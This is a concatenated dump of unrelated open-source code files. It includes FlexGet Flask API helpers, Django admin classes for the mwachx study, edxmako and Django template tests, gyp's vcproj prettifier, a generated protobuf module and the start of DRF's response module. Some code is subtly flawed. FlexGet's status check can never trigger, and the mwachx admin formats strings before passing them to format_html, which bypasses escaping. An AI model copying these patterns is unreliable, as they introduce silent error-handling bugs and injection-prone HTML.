response = self.app.open(
url, data=data, follow_redirects=True, method=method, headers=auth_header
)
result = json.loads(response.get_data(as_text=True))
# TODO: Proper exceptions
if 200 > response.status_code >= 300:
raise Exception(result['error'])
return result
class APIEndpoint:
def __init__(self, endpoint, caller):
self.endpoint = endpoint
self.caller = caller
def __getattr__(self, item):
return self.__class__(self.endpoint + '/' + item, self.caller)
__getitem__ = __getattr__
def __call__(self, data=None, method=None):
return self.caller(self.endpoint, data=data, method=method)
def api_version(f):
""" Add the 'API-Version' header to all responses """
@wraps(f)
def wrapped(*args, **kwargs):
rv = f(*args, **kwargs)
rv.headers['API-Version'] = __version__
return rv
return wrapped
class APIResource(Resource):
"""All api resources should subclass this class."""
method_decorators = [with_session, api_version]
def __init__(self, api, *args, **kwargs):
self.manager = manager.manager
super().__init__(api, *args, **kwargs)
class API(RestPlusAPI):
"""
Extends a flask restplus :class:`flask_restplus.Api` with:
- methods to make using json schemas easier
- methods to auto document and handle :class:`ApiError` responses
"""
def validate(self, model, schema_override=None, description=None):
"""
When a method is decorated with this, json data submitted to the endpoint will be validated with the given
`model`. This also auto-documents the expected model, as well as the possible :class:`ValidationError` response.
"""
def decorator(func):
@api.expect((model, description))
@api.response(ValidationError)
@wraps(func)
def wrapper(*args, **kwargs):
payload = request.json
try:
schema = schema_override if schema_override else model.__schema__
errors = process_config(config=payload, schema=schema, set_defaults=False)
if errors:
raise ValidationError(errors)
except RefResolutionError as e:
raise APIError(str(e))
return func(*args, **kwargs)
return wrapper
return decorator
def response(self, code_or_apierror, description='Success', model=None, **kwargs):
"""
Extends :meth:`flask_restplus.Api.response` to allow passing an :class:`ApiError` class instead of
response code. If an `ApiError` is used, the response code, and expected response model, is automatically
documented.
"""
try:
if issubclass(code_or_apierror, APIError):
description = code_or_apierror.description or description
return self.doc(
responses={
code_or_apierror.status_code: (
description,
code_or_apierror.response_model,
)
},
**kwargs,
)
except TypeError:
# If first argument isn't a class this happens
pass
return self.doc(responses={code_or_apierror: (description, model)}, **kwargs)
def pagination_parser(self, parser=None, sort_choices=None, default=None, add_sort=None):
"""
Return a standardized pagination parser, to be used for any endpoint that has pagination.
:param RequestParser parser: Can extend a given parser or create a new one
:param tuple sort_choices: A tuple of strings, to be used as server side attribute searches
:param str default: The default sort string, used `sort_choices[0]` if not given
:param bool add_sort: Add sort order choices without adding specific sort choices
:return: An api.parser() instance with pagination and sorting arguments.
"""
pagination = parser.copy() if parser else self.parser()
pagination.add_argument('page', type=int, default=1, help='Page number')
pagination.add_argument('per_page', type=int, default=50, help='Results per page')
if sort_choices or add_sort:
pagination.add_argument(
'order', choices=('desc', 'asc'), default='desc', help='Sorting order'
)
if sort_choices:
pagination.add_argument(
'sort_by',
choices=sort_choices,
default=default or sort_choices[0],
help='Sort by attribute',
)
return pagination
api_app = Flask(__name__, template_folder=os.path.join(__path__[0], 'templates'))
api_app.config['REMEMBER_COOKIE_NAME'] = 'flexget.token'
api_app.config['DEBUG'] = True
api_app.config['ERROR_404_HELP'] = False
api_app.url_map.strict_slashes = False
CORS(api_app, expose_headers='Link, Total-Count, Count, ETag')
Compress(api_app)
api = API(
api_app,
title='Flexget API v{}'.format(__version__),
version=__version__,
description='View and manage flexget core operations and plugins. Open each endpoint view for usage information.'
' Navigate to http://flexget.com/API for more details.',
format_checker=format_checker,
)
base_message = {
'type': 'object',
'properties': {
'status_code': {'type': 'integer'},
'message': {'type': 'string'},
'status': {'type': 'string'},
},
'required': ['status_code', 'message', 'status'],
}
base_message_schema = api.schema_model('base_message', base_message)
class APIError(Exception):
description = 'Server error'
status_code = 500
status = 'Error'
response_model = base_message_schema
def __init__(self, message=None, payload=None):
self.message = message
self.payload = payload
def to_dict(self):
rv = self.payload or {}
rv.update(status_code=self.status_code, message=self.message, status=self.status)
return rv
@classmethod
def schema(cls):
return cls.response_model.__schema__
class NotFoundError(APIError):
status_code = 404
description = 'Not found'
class Unauthorized(APIError):
status_code = 401
description = 'Unauthorized'
class BadRequest(APIError):
status_code = 400
description = 'Bad request'
class Conflict(APIError):
status_code = 409
description = 'Conflict'
class PreconditionFailed(APIError):
status_code = 412
description = 'Precondition failed'
class NotModified(APIError):
status_code = 304
description = 'not modified'
class ValidationError(APIError):
status_code = 422
description = 'Validation error'
response_model = api.schema_model(
'validation_error',
{
'type': 'object',
'properties': {
'validation_errors': {
'type': 'array',
'items': {
'type': 'object',
'properties': {
'message': {
'type': 'string',
'description': 'A human readable message explaining the error.',
},
'validator': {
'type': 'string',
'description': 'The name of the failed validator.',
},
'validator_value': {
'type': 'string',
'description': 'The value for the failed validator in the schema.',
},
'path': {'type': 'string'},
'schema_path': {'type': 'string'},
},
},
}
},
'required': ['validation_errors'],
},
)
verror_attrs = (
'message',
'cause',
'validator',
'validator_value',
'path',
'schema_path',
'parent',
)
def __init__(self, validation_errors, message='validation error'):
payload = {
'validation_errors': [self._verror_to_dict(error) for error in validation_errors]
}
super().__init__(message, payload=payload)
def _verror_to_dict(self, error):
error_dict = {}
for attr in self.verror_attrs:
if isinstance(getattr(error, attr), deque):
error_dict[attr] = list(getattr(error, attr))
else:
error_dict[attr] = str(getattr(error, attr))
return error_dict
empty_response = api.schema_model('empty', {'type': 'object'})
def success_response(message, status_code=200, status='success'):
rsp_dict = {'message': message, 'status_code': status_code, 'status': status}
rsp = jsonify(rsp_dict)
rsp.status_code = status_code
return rsp
@api.errorhandler(APIError)
@api.errorhandler(NotFoundError)
@api.errorhandler(ValidationError)
@api.errorhandler(BadRequest)
@api.errorhandler(Unauthorized)
@api.errorhandler(Conflict)
@api.errorhandler(NotModified)
@api.errorhandler(PreconditionFailed)
def api_errors(error):
return error.to_dict(), error.status_code
@with_session
def api_key(session=None):
logger.debug('fetching token for internal lookup')
return session.query(User).first().token
def etag(method=None, cache_age=0):
"""
A decorator that add an ETag header to the response and checks for the "If-Match" and "If-Not-Match" headers to
return an appropriate response.
:param method: A GET or HEAD flask method to wrap
:param cache_age: max-age cache age for the content
:return: The method's response with the ETag and Cache-Control headers, raises a 412 error or returns a 304 response
"""
# If called without method, we've been called with optional arguments.
# We return a decorator with the optional arguments filled in.
# Next time round we'll be decorating method.
if method is None:
return partial(etag, cache_age=cache_age)
@wraps(method)
def wrapped(*args, **kwargs):
# Identify if this is a GET or HEAD in order to proceed
assert request.method in ['HEAD', 'GET'], '@etag is only supported for GET requests'
rv = method(*args, **kwargs)
rv = make_response(rv)
# Some headers can change without data change for specific page
content_headers = (
rv.headers.get('link', '')
+ rv.headers.get('count', '')
+ rv.headers.get('total-count', '')
)
data = (rv.get_data().decode() + content_headers).encode()
etag = generate_etag(data)
rv.headers['Cache-Control'] = 'max-age=%s' % cache_age
rv.headers['ETag'] = etag
if_match = request.headers.get('If-Match')
if_none_match = request.headers.get('If-None-Match')
if if_match:
etag_list = [tag.strip() for tag in if_match.split(',')]
if etag not in etag_list and '*' not in etag_list:
raise PreconditionFailed('etag does not match')
elif if_none_match:
etag_list = [tag.strip() for tag in if_none_match.split(',')]
if etag in etag_list or '*' in etag_list:
raise NotModified
return rv
return wrapped
def pagination_headers(total_pages, total_items, page_count, request):
"""
Creates the `Link`. 'Count' and 'Total-Count' headers, to be used for pagination traversing
:param total_pages: Total number of pages
:param total_items: Total number of items in all the pages
:param page_count: Item count for page (may differ from page size request)
:param request: The flask request used, required to build other reoccurring vars like url and such.
:return:
"""
# Build constant variables from request data
url = request.url_root + request.path.lstrip('/')
per_page = request.args.get('per_page', 50)
page = int(request.args.get('page', 1))
# Build the base template
LINKTEMPLATE = '<{}?per_page={}&'.format(url, per_page)
# Removed page and per_page from query string
query_string = re.sub(br'per_page=\d+', b'', request.query_string)
query_string = re.sub(br'page=\d+', b'', query_string)
query_string = re.sub(b'&{2,}', b'&', query_string)
# Add all original query params
LINKTEMPLATE += query_string.decode().lstrip('&') + '&page={}>; rel="{}"'
link_string = ''
if page > 1:
link_string += LINKTEMPLATE.format(page - 1, 'prev') + ', '
if page < total_pages:
link_string += LINKTEMPLATE.format(page + 1, 'next') + ', '
link_string += LINKTEMPLATE.format(total_pages, 'last')
return {'Link': link_string, 'Total-Count': total_items, 'Count': page_count}
| mit |
I-TECH-UW/mwachx | contacts/admin.py | 2 | 6505 | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.models import User
from django.utils import html
#Local Imports
import models as cont
import utils.admin as utils
class ConnectionInline(admin.TabularInline):
model = cont.Connection
extra = 0
class NoteInline(admin.TabularInline):
model = cont.Note
extra = 1
def mark_quit(modeladmin, request, queryset):
''' mark all contacts in queryset as quit and save '''
for c in queryset:
c.set_status('quit',comment='Status set from bulk quit action')
mark_quit.short_description = 'Mark contact as quit'
def revert_status(modeladmin, request, queryset):
''' set the status for each contact in queryset to their previous status '''
for c in queryset:
old_status = c.statuschange_set.last().old
c.set_status(old_status,comment='Status reverted from bulk action')
revert_status.short_description = 'Revert to last status'
@admin.register(cont.Contact)
class ContactAdmin(admin.ModelAdmin):
list_display = ('study_id','nickname','status','description','facility',
'phone_number','due_date','language','send_day','is_validated','created')
list_display_links = ('study_id','nickname')
list_filter = ('facility','study_group', ('created',admin.DateFieldListFilter), 'hiv_messaging','status','is_validated','language','send_day')
ordering = ('study_id',)
search_fields = ('study_id','nickname','connection__identity','anc_num')
readonly_fields = ('last_msg_client','last_msg_system','created','modified')
inlines = (ConnectionInline,NoteInline)
actions = (mark_quit,revert_status,)
def ParticipantMixinFactory(field='participant'):
class ParticipantAdminMixinBase(object):
participant_field = field
def participant_name(self,obj):
participant = getattr(obj,self.participant_field)
if participant is not None:
return html.format_html("<a href='../contact/{0.pk}'>({0.study_id}) {0.nickname}</a>".format(participant) )
participant_name.short_description = 'Nickname'
participant_name.admin_order_field = '{}__study_id'.format(participant_field)
def facility(self,obj):
participant = getattr(obj,self.participant_field)
if participant is not None:
return participant.facility.capitalize()
facility.admin_order_field = '{}__facility'.format(participant_field)
def study_id(self,obj):
return getattr(obj,self.participant_field).study_id
study_id.short_description = 'Study ID'
study_id.admin_order_field = '{}__study_id'.format(participant_field)
def phone_number(self,obj):
connection = getattr(obj,self.participant_field).connection()
if connection is not None:
return html.format_html("<a href='../connection/{0.pk}'>{0.identity}</a>".format(connection) )
phone_number.short_description = 'Number'
phone_number.admin_order_field = '{}__connection__identity'.format(participant_field)
return ParticipantAdminMixinBase
ParticipantAdminMixin = ParticipantMixinFactory()
ContactAdminMixin = ParticipantMixinFactory('contact')
@admin.register(cont.Message)
class MessageAdmin(admin.ModelAdmin,ContactAdminMixin):
list_display = ('text','participant_name','identity','is_system',
'is_outgoing', 'is_reply', 'external_status', 'translation_status','created')
list_filter = ('is_system','is_outgoing', 'external_status', ('contact',utils.NullFieldListFilter),
('created', admin.DateFieldListFilter) ,'connection__contact__facility',
'translation_status','is_related','external_success')
date_hierarchy = 'created'
search_fields = ('contact__study_id','contact__nickname','connection__identity')
readonly_fields = ('created','modified')
def identity(self,obj):
return html.format_html("<a href='./?q={0.identity}'>{0.identity}</a>".format(
obj.connection
) )
identity.short_description = 'Number'
identity.admin_order_field = 'connection__identity'
@admin.register(cont.PhoneCall)
class PhoneCallAdmin(admin.ModelAdmin,ContactAdminMixin):
list_display = ('comment','participant_name','phone_number','outcome','is_outgoing','created')
date_hierarchy = 'created'
list_filter = ('outcome','is_outgoing')
readonly_fields = ('created','modified')
search_fields = ('contact__study_id','contact__nickname')
@admin.register(cont.Note)
class NoteAdmin(admin.ModelAdmin,ParticipantAdminMixin):
list_display = ('participant_name','comment','created')
date_hierarchy = 'created'
@admin.register(cont.Connection)
class ConnectionAdmin(admin.ModelAdmin,ContactAdminMixin):
list_display = ('identity','participant_name','facility','is_primary')
search_fields = ('contact__study_id','contact__nickname','identity')
@admin.register(cont.Visit)
class VisitAdmin(admin.ModelAdmin,ParticipantAdminMixin):
list_display = ('study_id','participant_name','visit_type','scheduled',
'notification_last_seen','notify_count', 'arrived','status')
date_hierarchy = 'scheduled'
list_filter = ('status','visit_type','arrived','scheduled')
search_fields = ('participant__study_id','participant__nickname')
@admin.register(cont.ScheduledPhoneCall)
class ScheduledPhoneCall(admin.ModelAdmin,ParticipantAdminMixin):
list_display = ('study_id','participant_name','call_type','scheduled',
'notification_last_seen','notify_count', 'arrived','status')
date_hierarchy = 'scheduled'
list_filter = ('status','call_type','arrived','scheduled')
search_fields = ('participant__study_id','participant__nickname')
@admin.register(cont.Practitioner)
class PractitionerAdmin(admin.ModelAdmin):
list_display = ('facility','username','password_changed')
@admin.register(cont.StatusChange)
class StatusChangeAdmin(admin.ModelAdmin,ContactAdminMixin):
list_display = ('comment','participant_name','old','new','type','created')
search_fields = ('contact__study_id','contact__nickname')
@admin.register(cont.EventLog)
class EventLogAdmin(admin.ModelAdmin):
list_display = ('user','event','created')
class PractitionerInline(admin.TabularInline):
model = cont.Practitioner
class UserAdmin(UserAdmin):
inlines = (PractitionerInline,)
#Re-register UserAdmin
admin.site.unregister(User)
admin.site.register(User,UserAdmin)
| apache-2.0 |
benpatterson/edx-platform | common/djangoapps/edxmako/tests.py | 88 | 4517 |
from mock import patch, Mock
import unittest
import ddt
from django.conf import settings
from django.http import HttpResponse
from django.test import TestCase
from django.test.utils import override_settings
from django.test.client import RequestFactory
from django.core.urlresolvers import reverse
import edxmako.middleware
from edxmako.middleware import get_template_request_context
from edxmako import add_lookup, LOOKUP
from edxmako.shortcuts import (
marketing_link,
render_to_string,
open_source_footer_context_processor
)
from student.tests.factories import UserFactory
from util.testing import UrlResetMixin
@ddt.ddt
class ShortcutsTests(UrlResetMixin, TestCase):
"""
Test the edxmako shortcuts file
"""
@override_settings(MKTG_URLS={'ROOT': 'dummy-root', 'ABOUT': '/about-us'})
@override_settings(MKTG_URL_LINK_MAP={'ABOUT': 'login'})
def test_marketing_link(self):
# test marketing site on
with patch.dict('django.conf.settings.FEATURES', {'ENABLE_MKTG_SITE': True}):
expected_link = 'dummy-root/about-us'
link = marketing_link('ABOUT')
self.assertEquals(link, expected_link)
# test marketing site off
with patch.dict('django.conf.settings.FEATURES', {'ENABLE_MKTG_SITE': False}):
# we are using login because it is common across both cms and lms
expected_link = reverse('login')
link = marketing_link('ABOUT')
self.assertEquals(link, expected_link)
@ddt.data((True, None), (False, None))
@ddt.unpack
def test_edx_footer(self, expected_result, _):
with patch.dict('django.conf.settings.FEATURES', {
'IS_EDX_DOMAIN': expected_result
}):
result = open_source_footer_context_processor({})
self.assertEquals(expected_result, result.get('IS_EDX_DOMAIN'))
class AddLookupTests(TestCase):
"""
Test the `add_lookup` function.
"""
@patch('edxmako.LOOKUP', {})
def test_with_package(self):
add_lookup('test', 'management', __name__)
dirs = LOOKUP['test'].directories
self.assertEqual(len(dirs), 1)
self.assertTrue(dirs[0].endswith('management'))
class MakoMiddlewareTest(TestCase):
"""
Test MakoMiddleware.
"""
def setUp(self):
super(MakoMiddlewareTest, self).setUp()
self.middleware = edxmako.middleware.MakoMiddleware()
self.user = UserFactory.create()
self.url = "/"
self.request = RequestFactory().get(self.url)
self.request.user = self.user
self.response = Mock(spec=HttpResponse)
def test_clear_request_context_variable(self):
"""
Test the global variable requestcontext is cleared correctly
when response middleware is called.
"""
self.middleware.process_request(self.request)
# requestcontext should not be None.
self.assertIsNotNone(get_template_request_context())
self.middleware.process_response(self.request, self.response)
# requestcontext should be None.
self.assertIsNone(get_template_request_context())
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in lms')
@patch("edxmako.middleware.REQUEST_CONTEXT")
def test_render_to_string_when_no_global_context_lms(self, context_mock):
"""
Test render_to_string() when makomiddleware has not initialized
the threadlocal REQUEST_CONTEXT.context. This is meant to run in LMS.
"""
del context_mock.context
self.assertIn("this module is temporarily unavailable", render_to_string("courseware/error-message.html", None))
@unittest.skipUnless(settings.ROOT_URLCONF == 'cms.urls', 'Test only valid in cms')
@patch("edxmako.middleware.REQUEST_CONTEXT")
def test_render_to_string_when_no_global_context_cms(self, context_mock):
"""
Test render_to_string() when makomiddleware has not initialized
the threadlocal REQUEST_CONTEXT.context. This is meant to run in CMS.
"""
del context_mock.context
self.assertIn("We're having trouble rendering your component", render_to_string("html_error.html", None))
def mako_middleware_process_request(request):
"""
Initialize the global RequestContext variable
edxmako.middleware.requestcontext using the request object.
"""
mako_middleware = edxmako.middleware.MakoMiddleware()
mako_middleware.process_request(request)
| agpl-3.0 |
dreamllq/node | tools/gyp/tools/pretty_vcproj.py | 2637 | 9586 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Make the format of a vcproj really pretty.
This script normalize and sort an xml. It also fetches all the properties
inside linked vsprops and include them explicitly in the vcproj.
It outputs the resulting xml to stdout.
"""
__author__ = 'nsylvain (Nicolas Sylvain)'
import os
import sys
from xml.dom.minidom import parse
from xml.dom.minidom import Node
REPLACEMENTS = dict()
ARGUMENTS = None
class CmpTuple(object):
"""Compare function between 2 tuple."""
def __call__(self, x, y):
return cmp(x[0], y[0])
class CmpNode(object):
"""Compare function between 2 xml nodes."""
def __call__(self, x, y):
def get_string(node):
node_string = "node"
node_string += node.nodeName
if node.nodeValue:
node_string += node.nodeValue
if node.attributes:
# We first sort by name, if present.
node_string += node.getAttribute("Name")
all_nodes = []
for (name, value) in node.attributes.items():
all_nodes.append((name, value))
all_nodes.sort(CmpTuple())
for (name, value) in all_nodes:
node_string += name
node_string += value
return node_string
return cmp(get_string(x), get_string(y))
def PrettyPrintNode(node, indent=0):
if node.nodeType == Node.TEXT_NODE:
if node.data.strip():
print '%s%s' % (' '*indent, node.data.strip())
return
if node.childNodes:
node.normalize()
# Get the number of attributes
attr_count = 0
if node.attributes:
attr_count = node.attributes.length
# Print the main tag
if attr_count == 0:
print '%s<%s>' % (' '*indent, node.nodeName)
else:
print '%s<%s' % (' '*indent, node.nodeName)
all_attributes = []
for (name, value) in node.attributes.items():
all_attributes.append((name, value))
all_attributes.sort(CmpTuple())
for (name, value) in all_attributes:
print '%s %s="%s"' % (' '*indent, name, value)
print '%s>' % (' '*indent)
if node.nodeValue:
print '%s %s' % (' '*indent, node.nodeValue)
for sub_node in node.childNodes:
PrettyPrintNode(sub_node, indent=indent+2)
print '%s</%s>' % (' '*indent, node.nodeName)
def FlattenFilter(node):
"""Returns a list of all the node and sub nodes."""
node_list = []
if (node.attributes and
node.getAttribute('Name') == '_excluded_files'):
# We don't add the "_excluded_files" filter.
return []
for current in node.childNodes:
if current.nodeName == 'Filter':
node_list.extend(FlattenFilter(current))
else:
node_list.append(current)
return node_list
def FixFilenames(filenames, current_directory):
new_list = []
for filename in filenames:
if filename:
for key in REPLACEMENTS:
filename = filename.replace(key, REPLACEMENTS[key])
os.chdir(current_directory)
filename = filename.strip('"\' ')
if filename.startswith('$'):
new_list.append(filename)
else:
new_list.append(os.path.abspath(filename))
return new_list
def AbsoluteNode(node):
"""Makes all the properties we know about in this node absolute."""
if node.attributes:
for (name, value) in node.attributes.items():
if name in ['InheritedPropertySheets', 'RelativePath',
'AdditionalIncludeDirectories',
'IntermediateDirectory', 'OutputDirectory',
'AdditionalLibraryDirectories']:
# We want to fix up these paths
path_list = value.split(';')
new_list = FixFilenames(path_list, os.path.dirname(ARGUMENTS[1]))
node.setAttribute(name, ';'.join(new_list))
if not value:
node.removeAttribute(name)
def CleanupVcproj(node):
"""For each sub node, we call recursively this function."""
for sub_node in node.childNodes:
AbsoluteNode(sub_node)
CleanupVcproj(sub_node)
# Normalize the node, and remove all extranous whitespaces.
for sub_node in node.childNodes:
if sub_node.nodeType == Node.TEXT_NODE:
sub_node.data = sub_node.data.replace("\r", "")
sub_node.data = sub_node.data.replace("\n", "")
sub_node.data = sub_node.data.rstrip()
# Fix all the semicolon separated attributes to be sorted, and we also
# remove the dups.
if node.attributes:
for (name, value) in node.attributes.items():
sorted_list = sorted(value.split(';'))
unique_list = []
for i in sorted_list:
if not unique_list.count(i):
unique_list.append(i)
node.setAttribute(name, ';'.join(unique_list))
if not value:
node.removeAttribute(name)
if node.childNodes:
node.normalize()
# For each node, take a copy, and remove it from the list.
node_array = []
while node.childNodes and node.childNodes[0]:
# Take a copy of the node and remove it from the list.
current = node.childNodes[0]
node.removeChild(current)
# If the child is a filter, we want to append all its children
# to this same list.
if current.nodeName == 'Filter':
node_array.extend(FlattenFilter(current))
else:
node_array.append(current)
# Sort the list.
node_array.sort(CmpNode())
# Insert the nodes in the correct order.
for new_node in node_array:
# But don't append empty tool node.
if new_node.nodeName == 'Tool':
if new_node.attributes and new_node.attributes.length == 1:
# This one was empty.
continue
if new_node.nodeName == 'UserMacro':
continue
node.appendChild(new_node)
def GetConfiguationNodes(vcproj):
#TODO(nsylvain): Find a better way to navigate the xml.
nodes = []
for node in vcproj.childNodes:
if node.nodeName == "Configurations":
for sub_node in node.childNodes:
if sub_node.nodeName == "Configuration":
nodes.append(sub_node)
return nodes
def GetChildrenVsprops(filename):
dom = parse(filename)
if dom.documentElement.attributes:
vsprops = dom.documentElement.getAttribute('InheritedPropertySheets')
return FixFilenames(vsprops.split(';'), os.path.dirname(filename))
return []
def SeekToNode(node1, child2):
# A text node does not have properties.
if child2.nodeType == Node.TEXT_NODE:
return None
# Get the name of the current node.
current_name = child2.getAttribute("Name")
if not current_name:
# There is no name. We don't know how to merge.
return None
# Look through all the nodes to find a match.
for sub_node in node1.childNodes:
if sub_node.nodeName == child2.nodeName:
name = sub_node.getAttribute("Name")
if name == current_name:
return sub_node
# No match. We give up.
return None
def MergeAttributes(node1, node2):
# No attributes to merge?
if not node2.attributes:
return
for (name, value2) in node2.attributes.items():
# Don't merge the 'Name' attribute.
if name == 'Name':
continue
value1 = node1.getAttribute(name)
if value1:
# The attribute exist in the main node. If it's equal, we leave it
# untouched, otherwise we concatenate it.
if value1 != value2:
node1.setAttribute(name, ';'.join([value1, value2]))
else:
# The attribute does nto exist in the main node. We append this one.
node1.setAttribute(name, value2)
# If the attribute was a property sheet attributes, we remove it, since
# they are useless.
if name == 'InheritedPropertySheets':
node1.removeAttribute(name)
def MergeProperties(node1, node2):
MergeAttributes(node1, node2)
for child2 in node2.childNodes:
child1 = SeekToNode(node1, child2)
if child1:
MergeProperties(child1, child2)
else:
node1.appendChild(child2.cloneNode(True))
def main(argv):
"""Main function of this vcproj prettifier."""
global ARGUMENTS
ARGUMENTS = argv
# check if we have exactly 1 parameter.
if len(argv) < 2:
print ('Usage: %s "c:\\path\\to\\vcproj.vcproj" [key1=value1] '
'[key2=value2]' % argv[0])
return 1
# Parse the keys
for i in range(2, len(argv)):
(key, value) = argv[i].split('=')
REPLACEMENTS[key] = value
# Open the vcproj and parse the xml.
dom = parse(argv[1])
# First thing we need to do is find the Configuration Node and merge them
# with the vsprops they include.
for configuration_node in GetConfiguationNodes(dom.documentElement):
# Get the property sheets associated with this configuration.
vsprops = configuration_node.getAttribute('InheritedPropertySheets')
# Fix the filenames to be absolute.
vsprops_list = FixFilenames(vsprops.strip().split(';'),
os.path.dirname(argv[1]))
# Extend the list of vsprops with all vsprops contained in the current
# vsprops.
for current_vsprops in vsprops_list:
vsprops_list.extend(GetChildrenVsprops(current_vsprops))
# Now that we have all the vsprops, we need to merge them.
for current_vsprops in vsprops_list:
MergeProperties(configuration_node,
parse(current_vsprops).documentElement)
# Now that everything is merged, we need to cleanup the xml.
CleanupVcproj(dom.documentElement)
# Finally, we use the prett xml function to print the vcproj back to the
# user.
#print dom.toprettyxml(newl="\n")
PrettyPrintNode(dom.documentElement)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
| apache-2.0 |
bikong2/django | tests/template_tests/syntax_tests/test_invalid_string.py | 440 | 2310 | from django.test import SimpleTestCase
from ..utils import setup
class InvalidStringTests(SimpleTestCase):
libraries = {'i18n': 'django.templatetags.i18n'}
@setup({'invalidstr01': '{{ var|default:"Foo" }}'})
def test_invalidstr01(self):
output = self.engine.render_to_string('invalidstr01')
if self.engine.string_if_invalid:
self.assertEqual(output, 'INVALID')
else:
self.assertEqual(output, 'Foo')
@setup({'invalidstr02': '{{ var|default_if_none:"Foo" }}'})
def test_invalidstr02(self):
output = self.engine.render_to_string('invalidstr02')
if self.engine.string_if_invalid:
self.assertEqual(output, 'INVALID')
else:
self.assertEqual(output, '')
@setup({'invalidstr03': '{% for v in var %}({{ v }}){% endfor %}'})
def test_invalidstr03(self):
output = self.engine.render_to_string('invalidstr03')
self.assertEqual(output, '')
@setup({'invalidstr04': '{% if var %}Yes{% else %}No{% endif %}'})
def test_invalidstr04(self):
output = self.engine.render_to_string('invalidstr04')
self.assertEqual(output, 'No')
@setup({'invalidstr04_2': '{% if var|default:"Foo" %}Yes{% else %}No{% endif %}'})
def test_invalidstr04_2(self):
output = self.engine.render_to_string('invalidstr04_2')
self.assertEqual(output, 'Yes')
@setup({'invalidstr05': '{{ var }}'})
def test_invalidstr05(self):
output = self.engine.render_to_string('invalidstr05')
if self.engine.string_if_invalid:
self.assertEqual(output, 'INVALID')
else:
self.assertEqual(output, '')
@setup({'invalidstr06': '{{ var.prop }}'})
def test_invalidstr06(self):
output = self.engine.render_to_string('invalidstr06')
if self.engine.string_if_invalid:
self.assertEqual(output, 'INVALID')
else:
self.assertEqual(output, '')
@setup({'invalidstr07': '{% load i18n %}{% blocktrans %}{{ var }}{% endblocktrans %}'})
def test_invalidstr07(self):
output = self.engine.render_to_string('invalidstr07')
if self.engine.string_if_invalid:
self.assertEqual(output, 'INVALID')
else:
self.assertEqual(output, '')
| bsd-3-clause |
unnikrishnankgs/va | venv/lib/python3.5/site-packages/google/protobuf/internal/more_messages_pb2.py | 4 | 4177 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/protobuf/internal/more_messages.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/protobuf/internal/more_messages.proto',
package='google.protobuf.internal',
syntax='proto2',
serialized_pb=_b('\n,google/protobuf/internal/more_messages.proto\x12\x18google.protobuf.internal\"h\n\x10OutOfOrderFields\x12\x17\n\x0foptional_sint32\x18\x05 \x01(\x11\x12\x17\n\x0foptional_uint32\x18\x03 \x01(\r\x12\x16\n\x0eoptional_int32\x18\x01 \x01(\x05*\x04\x08\x04\x10\x05*\x04\x08\x02\x10\x03:C\n\x0foptional_uint64\x12*.google.protobuf.internal.OutOfOrderFields\x18\x04 \x01(\x04:B\n\x0eoptional_int64\x12*.google.protobuf.internal.OutOfOrderFields\x18\x02 \x01(\x03')
)
OPTIONAL_UINT64_FIELD_NUMBER = 4
optional_uint64 = _descriptor.FieldDescriptor(
name='optional_uint64', full_name='google.protobuf.internal.optional_uint64', index=0,
number=4, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=True, extension_scope=None,
options=None)
OPTIONAL_INT64_FIELD_NUMBER = 2
optional_int64 = _descriptor.FieldDescriptor(
name='optional_int64', full_name='google.protobuf.internal.optional_int64', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=True, extension_scope=None,
options=None)
_OUTOFORDERFIELDS = _descriptor.Descriptor(
name='OutOfOrderFields',
full_name='google.protobuf.internal.OutOfOrderFields',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='optional_sint32', full_name='google.protobuf.internal.OutOfOrderFields.optional_sint32', index=0,
number=5, type=17, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='optional_uint32', full_name='google.protobuf.internal.OutOfOrderFields.optional_uint32', index=1,
number=3, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='optional_int32', full_name='google.protobuf.internal.OutOfOrderFields.optional_int32', index=2,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=True,
syntax='proto2',
extension_ranges=[(4, 5), (2, 3), ],
oneofs=[
],
serialized_start=74,
serialized_end=178,
)
DESCRIPTOR.message_types_by_name['OutOfOrderFields'] = _OUTOFORDERFIELDS
DESCRIPTOR.extensions_by_name['optional_uint64'] = optional_uint64
DESCRIPTOR.extensions_by_name['optional_int64'] = optional_int64
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
OutOfOrderFields = _reflection.GeneratedProtocolMessageType('OutOfOrderFields', (_message.Message,), dict(
DESCRIPTOR = _OUTOFORDERFIELDS,
__module__ = 'google.protobuf.internal.more_messages_pb2'
# @@protoc_insertion_point(class_scope:google.protobuf.internal.OutOfOrderFields)
))
_sym_db.RegisterMessage(OutOfOrderFields)
OutOfOrderFields.RegisterExtension(optional_uint64)
OutOfOrderFields.RegisterExtension(optional_int64)
# @@protoc_insertion_point(module_scope)
| bsd-2-clause |
rense/django-rest-framework | rest_framework/response.py | 17 | 3615 | """
The Response class in REST framework is similar to HTTPResponse, except that
it is initialized with unrendered data, instead of a pre-rendered string.
The appropriate renderer is called during Django's template response rendering.
"""
from __future__ import unicode_literals
from django.template.response import SimpleTemplateResponse
from django.utils import six
